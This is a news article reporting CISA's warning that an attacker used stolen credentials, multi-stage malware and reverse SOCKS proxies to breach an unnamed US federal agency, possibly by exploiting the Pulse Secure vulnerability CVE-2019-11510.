A warning has been issued by America's Cybersecurity and Infrastructure Security Agency (CISA) after a malicious cyber-actor compromised a United States federal agency.
The attacker used valid log-in credentials for multiple users’ Microsoft Office 365 accounts and domain administrator accounts to gain access to the agency's enterprise network. Once inside, the bad actor infected the network with sophisticated malware.
"By leveraging compromised credentials, the cyber threat actor implanted sophisticated malware—including multi-stage malware that evaded the affected agency’s anti-malware protection—and gained persistent access through two reverse Socket Secure (SOCKS) proxies that exploited weaknesses in the agency’s firewall," said CISA in a statement released yesterday.
CISA was alerted to a potential compromise of a federal agency's network via EINSTEIN, an intrusion detection system that monitors federal civilian networks.
Malicious activity was confirmed during an investigation launched by CISA in conjunction with the affected agency.
Investigators found the threat actor logged into a user's Office 365 account remotely, then browsed pages on a SharePoint site and downloaded a file. The threat actor then connected multiple times by Transmission Control Protocol to the victim organization’s virtual private network (VPN) server.
“Immediately afterward, the threat actor used common Microsoft Windows command line processes—conhost, ipconfig, net, query, netstat, ping and whoami, plink.exe—to enumerate the compromised system and network,” stated CISA.
The cyber-criminal copied files and exfiltrated the data via a Microsoft Windows Terminal Services client. Further attacks were planned, as the intruder created a backdoor.
CISA analysts were not able to determine how the cyber threat actor initially obtained the credentials used in the attack; however, they did come up with a theory involving Pulse Secure.
"It is possible the cyber actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability—CVE-2019-11510—in Pulse Secure," stated CISA, adding that it "has observed wide exploitation of CVE-2019-11510 across the federal government."
The error allows the remote, unauthenticated retrieval of files, including passwords. Patches were released by Pulse Secure in April 2019 for several critical vulnerabilities, including CVE-2019-11510.
No details of when the attack took place or which agency was compromised have been released.